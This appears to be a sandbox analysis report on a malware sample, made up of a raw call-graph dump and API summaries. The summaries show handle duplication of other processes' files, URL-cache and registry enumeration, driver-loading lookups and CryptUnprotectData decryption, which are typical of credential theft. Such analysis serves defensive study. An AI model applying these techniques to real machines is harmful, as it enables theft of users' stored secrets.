38730->38731 38732 413d2f FreeLibrary 38730->38732 38733 40b633 free 38731->38733 38732->38731 38734 413d42 38733->38734 38735 40b633 free 38734->38735 38736 413d4a 38735->38736 38736->38250 38737->38253 38738->38306 38739->38320 38741 44db70 38740->38741 38742 40b6fc memset 38741->38742 38743 409c70 2 API calls 38742->38743 38744 40b732 wcsrchr 38743->38744 38745 40b743 38744->38745 38746 40b746 memset 38744->38746 38745->38746 38747 40b2cc 27 API calls 38746->38747 38748 40b76f 38747->38748 38749 409d1f 6 API calls 38748->38749 38750 40b783 38749->38750 39800 409b98 GetFileAttributesW 38750->39800 38752 40b792 38753 40b7c2 38752->38753 38754 409c70 2 API calls 38752->38754 39801 40bb98 38753->39801 38756 40b7a5 38754->38756 38758 40b2cc 27 API calls 38756->38758 38762 40b7b2 38758->38762 38759 40b837 CloseHandle 38761 40b83e memset 38759->38761 38760 40b817 38763 409a45 3 API calls 38760->38763 39834 40a6e6 WideCharToMultiByte 38761->39834 38765 409d1f 6 API calls 38762->38765 38766 40b827 CopyFileW 38763->38766 38765->38753 38766->38761 38767 40b866 38768 444432 121 API calls 38767->38768 38770 40b879 38768->38770 38769 40bad5 38772 40baeb 38769->38772 38773 40bade DeleteFileW 38769->38773 38770->38769 38771 40b273 27 API calls 38770->38771 38774 40b89a 38771->38774 38775 40b04b ??3@YAXPAX 38772->38775 38773->38772 38776 438552 134 API calls 38774->38776 38777 40baf3 38775->38777 38778 40b8a4 38776->38778 38777->38330 38779 40bacd 38778->38779 38781 4251c4 137 API calls 38778->38781 38780 443d90 111 API calls 38779->38780 38780->38769 38804 40b8b8 38781->38804 38782 40bac6 39844 424f26 123 API calls 38782->39844 38783 40b8bd memset 39835 425413 17 API calls 38783->39835 38786 425413 17 API calls 38786->38804 38789 40a71b MultiByteToWideChar 38789->38804 38790 40a734 MultiByteToWideChar 38790->38804 38793 40b9b5 memcmp 38793->38804 38794 4099c6 2 API calls 38794->38804 38795 404423 38 API calls 38795->38804 38798 40bb3e memset memcpy 39845 40a734 
MultiByteToWideChar 38798->39845 38799 4251c4 137 API calls 38799->38804 38801 40bb88 LocalFree 38801->38804 38804->38782 38804->38783 38804->38786 38804->38789 38804->38790 38804->38793 38804->38794 38804->38795 38804->38798 38804->38799 38805 40ba5f memcmp 38804->38805 39836 4253ef 16 API calls 38804->39836 39837 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38804->39837 39838 4253af 17 API calls 38804->39838 39839 4253cf 17 API calls 38804->39839 39840 447280 memset 38804->39840 39841 447960 memset memcpy memcpy memcpy 38804->39841 39842 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38804->39842 39843 447920 memcpy memcpy memcpy 38804->39843 38805->38804 38806->38332 38808 40aed1 38807->38808 38809 40aec7 FindClose 38807->38809 38808->38264 38809->38808 38811 4099d7 38810->38811 38812 4099da memcpy 38810->38812 38811->38812 38812->38315 38814 40b2cc 27 API calls 38813->38814 38815 44543f 38814->38815 38816 409d1f 6 API calls 38815->38816 38817 44544f 38816->38817 39929 409b98 GetFileAttributesW 38817->39929 38819 44545e 38820 445476 38819->38820 38821 40b6ef 253 API calls 38819->38821 38822 40b2cc 27 API calls 38820->38822 38821->38820 38823 445482 38822->38823 38824 409d1f 6 API calls 38823->38824 38825 445492 38824->38825 39930 409b98 GetFileAttributesW 38825->39930 38827 4454a1 38828 4454b9 38827->38828 38829 40b6ef 253 API calls 38827->38829 38828->38345 38829->38828 38830->38344 38831->38361 38832->38367 38833->38404 38834->38381 38835->38431 38836->38431 38837->38412 38838->38442 38839->38444 38840->38446 38842 414c2e 17 API calls 38841->38842 38843 40c2ae 38842->38843 38913 40c1d3 38843->38913 38848 40c3be 38865 40a8ab 38848->38865 38849 40afcf 2 API calls 38850 40c2fd FindFirstUrlCacheEntryW 38849->38850 38851 40c3b6 38850->38851 38852 40c31e wcschr 38850->38852 38853 40b04b ??3@YAXPAX 38851->38853 38854 40c331 38852->38854 38855 40c35e FindNextUrlCacheEntryW 38852->38855 38853->38848 38857 40a8ab 9 API calls 38854->38857 38855->38852 38856 40c373 
GetLastError 38855->38856 38858 40c3ad FindCloseUrlCache 38856->38858 38859 40c37e 38856->38859 38860 40c33e wcschr 38857->38860 38858->38851 38861 40afcf 2 API calls 38859->38861 38860->38855 38862 40c34f 38860->38862 38863 40c391 FindNextUrlCacheEntryW 38861->38863 38864 40a8ab 9 API calls 38862->38864 38863->38852 38863->38858 38864->38855 39122 40a97a 38865->39122 38868 40a8cc 38868->38453 38869 40a8d0 7 API calls 38869->38868 39127 40b1ab free free 38870->39127 38872 40c3dd 38873 40b2cc 27 API calls 38872->38873 38874 40c3e7 38873->38874 39128 414592 RegOpenKeyExW 38874->39128 38876 40c3f4 38877 40c50e 38876->38877 38878 40c3ff 38876->38878 38892 405337 38877->38892 38879 40a9ce 4 API calls 38878->38879 38880 40c418 memset 38879->38880 39129 40aa1d 38880->39129 38883 40c471 38885 40c47a _wcsupr 38883->38885 38884 40c505 RegCloseKey 38884->38877 38886 40a8d0 7 API calls 38885->38886 38887 40c498 38886->38887 38888 40a8d0 7 API calls 38887->38888 38889 40c4ac memset 38888->38889 38890 40aa1d 38889->38890 38891 40c4e4 RegEnumValueW 38890->38891 38891->38884 38891->38885 39131 405220 38892->39131 38896 4099c6 2 API calls 38895->38896 38897 40a714 _wcslwr 38896->38897 38898 40c634 38897->38898 39188 405361 38898->39188 38901 40c65c wcslen 39191 4053b6 39 API calls 38901->39191 38902 40c71d wcslen 38902->38462 38904 40c677 38905 40c713 38904->38905 39192 40538b 39 API calls 38904->39192 39194 4053df 39 API calls 38905->39194 38908 40c6a5 38908->38905 38909 40c6a9 memset 38908->38909 38910 40c6d3 38909->38910 39193 40c589 44 API calls 38910->39193 38912->38460 38914 40ae18 9 API calls 38913->38914 38920 40c210 38914->38920 38915 40ae51 9 API calls 38915->38920 38916 40c264 38917 40aebe FindClose 38916->38917 38919 40c26f 38917->38919 38918 40add4 2 API calls 38918->38920 38925 40e5ed memset memset 38919->38925 38920->38915 38920->38916 38920->38918 38921 40c231 _wcsicmp 38920->38921 38922 40c1d3 35 API calls 38920->38922 38921->38920 38923 40c248 38921->38923 
38922->38920 38938 40c084 22 API calls 38923->38938 38926 414c2e 17 API calls 38925->38926 38927 40e63f 38926->38927 38928 409d1f 6 API calls 38927->38928 38929 40e658 38928->38929 38939 409b98 GetFileAttributesW 38929->38939 38931 40e667 38932 40e680 38931->38932 38933 409d1f 6 API calls 38931->38933 38940 409b98 GetFileAttributesW 38932->38940 38933->38932 38935 40e68f 38936 40c2d8 38935->38936 38941 40e4b2 38935->38941 38936->38848 38936->38849 38938->38920 38939->38931 38940->38935 38962 40e01e 38941->38962 38943 40e593 38944 40e5b0 38943->38944 38945 40e59c DeleteFileW 38943->38945 38946 40b04b ??3@YAXPAX 38944->38946 38945->38944 38948 40e5bb 38946->38948 38947 40e521 38947->38943 38985 40e175 38947->38985 38950 40e5c4 CloseHandle 38948->38950 38951 40e5cc 38948->38951 38950->38951 38953 40b633 free 38951->38953 38952 40e573 38954 40e584 38952->38954 38955 40e57c CloseHandle 38952->38955 38956 40e5db 38953->38956 39028 40b1ab free free 38954->39028 38955->38954 38958 40b633 free 38956->38958 38959 40e5e3 38958->38959 38959->38936 38961 40e540 38961->38952 39005 40e2ab 38961->39005 39029 406214 38962->39029 38965 40e16b 38965->38947 38968 40afcf 2 API calls 38969 40e08d OpenProcess 38968->38969 38970 40e0a4 GetCurrentProcess DuplicateHandle 38969->38970 38974 40e152 38969->38974 38971 40e0d0 GetFileSize 38970->38971 38972 40e14a CloseHandle 38970->38972 39065 409a45 GetTempPathW 38971->39065 38972->38974 38973 40e160 38977 40b04b ??3@YAXPAX 38973->38977 38974->38973 38976 406214 22 API calls 38974->38976 38976->38973 38977->38965 38978 40e0ea 39068 4096dc CreateFileW 38978->39068 38980 40e0f1 CreateFileMappingW 38981 40e140 CloseHandle CloseHandle 38980->38981 38982 40e10b MapViewOfFile 38980->38982 38981->38972 38983 40e13b CloseHandle 38982->38983 38984 40e11f WriteFile UnmapViewOfFile 38982->38984 38983->38981 38984->38983 38986 40e18c 38985->38986 39069 406b90 38986->39069 38989 40e1a7 memset 38995 40e1e8 38989->38995 38990 40e299 39101 4069a3 38990->39101 
38996 40e283 38995->38996 38997 40dd50 _wcsicmp 38995->38997 39003 40e244 _snwprintf 38995->39003 39079 406e8f 38995->39079 39108 40742e 8 API calls 38995->39108 39109 40aae3 wcslen wcslen _memicmp 38995->39109 39110 406b53 SetFilePointerEx ReadFile 38995->39110 38998 40e291 38996->38998 38999 40e288 free 38996->38999 38997->38995 39000 40aa04 free 38998->39000 38999->38998 39000->38990 39004 40a8d0 7 API calls 39003->39004 39004->38995 39006 40e2c2 39005->39006 39007 406b90 11 API calls 39006->39007 39008 40e2d3 39007->39008 39009 40e4a0 39008->39009 39011 406e8f 13 API calls 39008->39011 39014 40e489 39008->39014 39017 40dd50 _wcsicmp 39008->39017 39023 40e3e0 memcpy 39008->39023 39024 40e3fb memcpy 39008->39024 39025 40e3b3 wcschr 39008->39025 39026 40e416 memcpy 39008->39026 39027 40e431 memcpy 39008->39027 39111 40dd50 _wcsicmp 39008->39111 39120 40742e 8 API calls 39008->39120 39121 406b53 SetFilePointerEx ReadFile 39008->39121 39010 4069a3 2 API calls 39009->39010 39012 40e4ab 39010->39012 39011->39008 39012->38961 39015 40aa04 free 39014->39015 39016 40e491 39015->39016 39016->39009 39018 40e497 free 39016->39018 39017->39008 39018->39009 39020 40e376 memset 39112 40aa29 39020->39112 39023->39008 39024->39008 39025->39008 39026->39008 39027->39008 39028->38943 39030 406294 CloseHandle 39029->39030 39031 406224 39030->39031 39032 4096c3 CreateFileW 39031->39032 39033 40622d 39032->39033 39034 406281 GetLastError 39033->39034 39035 40a2ef ReadFile 39033->39035 39037 40625a 39034->39037 39036 406244 39035->39036 39036->39034 39038 40624b 39036->39038 39037->38965 39040 40dd85 memset 39037->39040 39038->39037 39039 406777 19 API calls 39038->39039 39039->39037 39041 409bca GetModuleFileNameW 39040->39041 39042 40ddbe CreateFileW 39041->39042 39045 40ddf1 39042->39045 39043 40afcf ??2@YAPAXI ??3@YAXPAX 39043->39045 39044 41352f 9 API calls 39044->39045 39045->39043 39045->39044 39046 40de0b NtQuerySystemInformation 39045->39046 39047 40de3b CloseHandle 
GetCurrentProcessId 39045->39047 39046->39045 39048 40de54 39047->39048 39049 413d4c 46 API calls 39048->39049 39058 40de88 39049->39058 39050 40e00c 39051 413d29 free FreeLibrary 39050->39051 39052 40e014 39051->39052 39052->38965 39052->38968 39053 40dea9 _wcsicmp 39054 40dee7 OpenProcess 39053->39054 39055 40debd _wcsicmp 39053->39055 39054->39058 39055->39054 39056 40ded0 _wcsicmp 39055->39056 39056->39054 39056->39058 39057 40dfef CloseHandle 39057->39058 39058->39050 39058->39053 39058->39057 39059 40df23 GetCurrentProcess DuplicateHandle 39058->39059 39062 40df8f CloseHandle 39058->39062 39063 40df78 39058->39063 39059->39058 39060 40df4c memset 39059->39060 39061 41352f 9 API calls 39060->39061 39061->39058 39062->39063 39063->39057 39063->39062 39064 40dfae _wcsicmp 39063->39064 39064->39058 39064->39063 39066 409a74 GetTempFileNameW 39065->39066 39067 409a66 GetWindowsDirectoryW 39065->39067 39066->38978 39067->39066 39068->38980 39070 406bd5 39069->39070 39071 406bad 39069->39071 39073 4066bf free malloc memcpy free free 39070->39073 39078 406c0f 39070->39078 39071->39070 39072 406bba _wcsicmp 39071->39072 39072->39070 39072->39071 39074 406be5 39073->39074 39075 40afcf ??2@YAPAXI ??3@YAXPAX 39074->39075 39074->39078 39076 406bff 39075->39076 39077 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39076->39077 39077->39078 39078->38989 39078->38990 39081 406ed1 39079->39081 39080 407424 39080->38995 39081->39080 39082 40b633 free 39081->39082 39083 406f4e 39082->39083 39084 406f73 memset 39083->39084 39085 4070d4 39083->39085 39087 407080 free 39083->39087 39088 4099f4 malloc memcpy free 39083->39088 39090 4069df memcpy 39083->39090 39092 406a10 memcpy 39083->39092 39093 406aa2 memcpy 39083->39093 39084->39083 39085->39080 39086 40718b 39085->39086 39091 4069df memcpy 39085->39091 39095 40717b 39085->39095 39089 4069df memcpy 39086->39089 39099 40730b 39086->39099 39087->39083 39088->39083 39100 4071f1 39089->39100 39090->39083 39091->39085 
39092->39083 39093->39083 39094 4069df memcpy 39094->39100 39096 4069df memcpy 39095->39096 39096->39086 39097 406c5a 6 API calls 39097->39099 39098 406c28 ??2@YAPAXI ??3@YAXPAX 39098->39099 39099->39080 39099->39097 39099->39098 39100->39094 39100->39099 39102 4069c4 ??3@YAXPAX 39101->39102 39103 4069af 39102->39103 39104 40b633 free 39103->39104 39105 4069ba 39104->39105 39106 40b04b ??3@YAXPAX 39105->39106 39107 4069c2 39106->39107 39107->38961 39108->38995 39109->38995 39110->38995 39111->39020 39113 40aa33 39112->39113 39114 40aa63 39112->39114 39115 40aa44 39113->39115 39116 40aa38 wcslen 39113->39116 39114->39008 39117 40a9ce malloc memcpy free free 39115->39117 39116->39115 39118 40aa4d 39117->39118 39118->39114 39119 40aa51 memcpy 39118->39119 39119->39114 39120->39008 39121->39008 39126 40a980 39122->39126 39123 40a8bb 39123->38868 39123->38869 39124 40a995 _wcsicmp 39124->39126 39125 40a99c wcscmp 39125->39126 39126->39123 39126->39124 39126->39125 39127->38872 39128->38876 39130 40aa23 RegEnumValueW 39129->39130 39130->38883 39130->38884 39132 405335 39131->39132 39133 40522a 39131->39133 39132->38462 39134 40b2cc 27 API calls 39133->39134 39135 405234 39134->39135 39136 40a804 8 API calls 39135->39136 39137 40523a 39136->39137 39176 40b273 39137->39176 39139 405248 _mbscpy _mbscat GetProcAddress 39140 40b273 27 API calls 39139->39140 39141 405279 39140->39141 39179 405211 GetProcAddress 39141->39179 39143 405282 39144 40b273 27 API calls 39143->39144 39145 40528f 39144->39145 39180 405211 GetProcAddress 39145->39180 39147 405298 39148 40b273 27 API calls 39147->39148 39149 4052a5 39148->39149 39181 405211 GetProcAddress 39149->39181 39151 4052ae 39152 40b273 27 API calls 39151->39152 39153 4052bb 39152->39153 39182 405211 GetProcAddress 39153->39182 39155 4052c4 39156 40b273 27 API calls 39155->39156 39157 4052d1 39156->39157 39183 405211 GetProcAddress 39157->39183 39159 4052da 39160 40b273 27 API calls 39159->39160 39161 4052e7 39160->39161 39184 
405211 GetProcAddress 39161->39184 39163 4052f0 39164 40b273 27 API calls 39163->39164 39165 4052fd 39164->39165 39177 40b58d 27 API calls 39176->39177 39178 40b18c 39177->39178 39178->39139 39179->39143 39180->39147 39181->39151 39182->39155 39183->39159 39184->39163 39189 405220 39 API calls 39188->39189 39190 405369 39189->39190 39190->38901 39190->38902 39191->38904 39192->38908 39193->38905 39194->38902 39196 40440c FreeLibrary 39195->39196 39197 40436d 39196->39197 39198 40a804 8 API calls 39197->39198 39199 404377 39198->39199 39200 404383 39199->39200 39201 404405 39199->39201 39202 40b273 27 API calls 39200->39202 39201->38472 39201->38473 39201->38474 39203 40438d GetProcAddress 39202->39203 39204 40b273 27 API calls 39203->39204 39205 4043a7 GetProcAddress 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4043ba GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4043ce GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4043e2 GetProcAddress 39210->39211 39212 4043f1 39211->39212 39213 4043f7 39212->39213 39214 40440c FreeLibrary 39212->39214 39213->39201 39214->39201 39216 404413 FreeLibrary 39215->39216 39217 40441e 39215->39217 39216->39217 39217->38490 39218->38487 39220 40447e 39219->39220 39221 40442e 39219->39221 39222 404485 CryptUnprotectData 39220->39222 39223 40449c 39220->39223 39224 40b2cc 27 API calls 39221->39224 39222->39223 39223->38487 39225 404438 39224->39225 39226 40a804 8 API calls 39225->39226 39227 40443e 39226->39227 39228 404445 39227->39228 39229 404467 39227->39229 39230 40b273 27 API calls 39228->39230 39229->39220 39232 404475 FreeLibrary 39229->39232 39231 40444f GetProcAddress 39230->39231 39231->39229 39233 404460 39231->39233 39232->39220 39233->39229 39235 4135f6 39234->39235 39236 4135eb FreeLibrary 39234->39236 39235->38493 39236->39235 39238 4449c4 39237->39238 39239 444a52 39237->39239 39240 40b2cc 27 API calls 39238->39240 39239->38510 39239->38511 39241 4449cb 
39240->39241 39242 40a804 8 API calls 39241->39242 39243 4449d1 39242->39243 39244 40b273 27 API calls 39243->39244 39245 4449dc GetProcAddress 39244->39245 39246 40b273 27 API calls 39245->39246 39258->38521 39259->38521 39260->38521 39261->38521 39262->38512 39264 403a29 39263->39264 39278 403bed memset memset 39264->39278 39266 403ae7 39291 40b1ab free free 39266->39291 39267 403a3f memset 39270 403a2f 39267->39270 39269 403aef 39269->38528 39270->39266 39270->39267 39271 409d1f 6 API calls 39270->39271 39272 409b98 GetFileAttributesW 39270->39272 39273 40a8d0 7 API calls 39270->39273 39271->39270 39272->39270 39273->39270 39275 40a051 GetFileTime CloseHandle 39274->39275 39276 4039ca CompareFileTime 39274->39276 39275->39276 39276->38528 39277->38527 39279 414c2e 17 API calls 39278->39279 39280 403c38 39279->39280 39281 409719 2 API calls 39280->39281 39282 403c3f wcscat 39281->39282 39283 414c2e 17 API calls 39282->39283 39284 403c61 39283->39284 39285 409719 2 API calls 39284->39285 39286 403c68 wcscat 39285->39286 39292 403af5 39286->39292 39289 403af5 20 API calls 39290 403c95 39289->39290 39290->39270 39291->39269 39293 403b02 39292->39293 39294 40ae18 9 API calls 39293->39294 39300 403b37 39294->39300 39295 403bdb 39296 40aebe FindClose 39295->39296 39297 403be6 39296->39297 39297->39289 39298 40ae18 9 API calls 39298->39300 39299 40ae51 9 API calls 39299->39300 39300->39295 39300->39298 39300->39299 39301 40add4 wcscmp wcscmp 39300->39301 39302 40aebe FindClose 39300->39302 39303 40a8d0 7 API calls 39300->39303 39301->39300 39302->39300 39303->39300 39305 409d1f 6 API calls 39304->39305 39306 404190 39305->39306 39319 409b98 GetFileAttributesW 39306->39319 39308 40419c 39309 4041a7 6 API calls 39308->39309 39310 40435c 39308->39310 39311 40424f 39309->39311 39310->38553 39311->39310 39313 40425e memset 39311->39313 39315 409d1f 6 API calls 39311->39315 39316 40a8ab 9 API calls 39311->39316 39320 414842 39311->39320 39313->39311 39314 404296 wcscpy 
39313->39314 39314->39311 39315->39311 39317 4042b6 memset memset _snwprintf wcscpy 39316->39317 39317->39311 39318->38554 39319->39308 39323 41443e 39320->39323 39322 414866 39322->39311 39324 41444b 39323->39324 39325 414451 39324->39325 39326 4144a3 GetPrivateProfileStringW 39324->39326 39327 414491 39325->39327 39328 414455 wcschr 39325->39328 39326->39322 39330 414495 WritePrivateProfileStringW 39327->39330 39328->39327 39329 414463 _snwprintf 39328->39329 39329->39330 39330->39322 39331->38559 39333 40b2cc 27 API calls 39332->39333 39334 409615 39333->39334 39335 409d1f 6 API calls 39334->39335 39336 409625 39335->39336 39361 409b98 GetFileAttributesW 39336->39361 39338 409634 39339 409648 39338->39339 39362 4091b8 memset 39338->39362 39341 40b2cc 27 API calls 39339->39341 39344 408801 39339->39344 39342 40965d 39341->39342 39343 409d1f 6 API calls 39342->39343 39345 40966d 39343->39345 39344->38562 39344->38589 39414 409b98 GetFileAttributesW 39345->39414 39347 40967c 39347->39344 39348 409681 39347->39348 39415 409529 72 API calls 39348->39415 39350 409690 39350->39344 39361->39338 39416 40a6e6 WideCharToMultiByte 39362->39416 39364 409202 39417 444432 39364->39417 39367 40b273 27 API calls 39368 409236 39367->39368 39463 438552 39368->39463 39394 40951d 39394->39339 39414->39347 39415->39350 39416->39364 39418 4438b5 11 API calls 39417->39418 39419 44444c 39418->39419 39420 409215 39419->39420 39513 415a6d 39419->39513 39420->39367 39420->39394 39422 4442e6 11 API calls 39424 44469e 39422->39424 39423 444486 39425 4444b9 memcpy 39423->39425 39462 4444a4 39423->39462 39424->39420 39427 443d90 111 API calls 39424->39427 39517 415258 39425->39517 39427->39420 39428 444524 39429 444541 39428->39429 39430 44452a 39428->39430 39462->39422 39634 438460 39463->39634 39514 415a77 39513->39514 39515 415a8d 39514->39515 39516 415a7e memset 39514->39516 39515->39423 39516->39515 39518 4438b5 11 API calls 39517->39518 39519 41525d 39518->39519 39519->39428 39646 41703f 

                                                            Control-flow Graph

                                                            • Graph not reproduced (legend: Executed / Not Executed); first node 338 (40dd85-40ddeb)
                                                            APIs
                                                            • memset.MSVCRT ref: 0040DDAD
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                            • memset.MSVCRT ref: 0040DF5F
                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                            • API String ID: 708747863-3398334509
                                                            • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                            • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                            Control-flow Graph

                                                            • Graph not reproduced (legend: Executed / Not Executed); first node 830 (413d4c-413da0)
                                                            APIs
                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                            • memset.MSVCRT ref: 00413D7F
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                            • memset.MSVCRT ref: 00413E07
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                            • free.MSVCRT ref: 00413EC1
                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                            • API String ID: 1344430650-1740548384
                                                            • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                            • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                            Control-flow Graph

                                                            • Graph not reproduced (legend: Executed / Not Executed); first node 949 (40b58d-40b59e)
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                            • String ID: AE$BIN
                                                            • API String ID: 1668488027-3931574542
                                                            APIs
                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                            • free.MSVCRT ref: 00418803
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                            • String ID:
                                                            • API String ID: 1355100292-0
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
